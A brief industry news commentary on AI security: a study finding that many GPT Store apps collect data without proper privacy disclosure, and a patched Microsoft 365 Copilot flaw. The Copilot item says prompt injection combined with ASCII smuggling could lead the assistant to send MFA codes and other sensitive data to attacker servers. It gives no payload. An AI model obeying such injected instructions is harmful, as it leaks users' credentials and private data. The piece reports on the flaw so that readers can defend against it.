Press "Enter" to skip to content

Washington University Study Uncovers Data Privacy Risks in GPT Store

Let’s talk about some vulnerabilities, too.

A study by researchers from Washington University reveals that many GPT apps in OpenAI’s GPT Store violate data collection policies, with only 5.8% of services clearly disclosing their practices. The analysis of nearly 120,000 GPTs found extensive data collection, including sensitive information like passwords, often without adequate privacy documentation. The researchers highlight significant privacy and security issues, noting that third-party Actions within GPTs can access and share user data across apps, raising data exposure risks. Despite OpenAI’s removal of non-compliant GPTs, the study concludes that the company’s enforcement and privacy controls are insufficient.

Microsoft has patched a vulnerability in Microsoft 365 Copilot that allowed data theft through ASCII smuggling, which made invisible data clickable. The attack involved prompt injection and could exfiltrate sensitive information, including MFA codes, to adversary-controlled servers. Microsoft emphasized the need for enterprises to assess their risk and implement security controls to prevent data leaks from Copilot systems.

Why do we care?

The vulnerabilities exposed in AI platforms like GPT apps and Microsoft 365 Copilot highlight the growing security risks associated with AI adoption. For IT service providers, this is a call to focus on AI-specific security and privacy strategies. From conducting AI risk assessments to enforcing stricter data governance and compliance checks, the future of AI relies on ensuring that these systems are secure and compliant. Businesses adopting AI need partners who understand these risks and can provide proactive solutions to mitigate potential vulnerabilities, ensuring AI innovation doesn’t come at the cost of privacy and security.    And that partner should be you.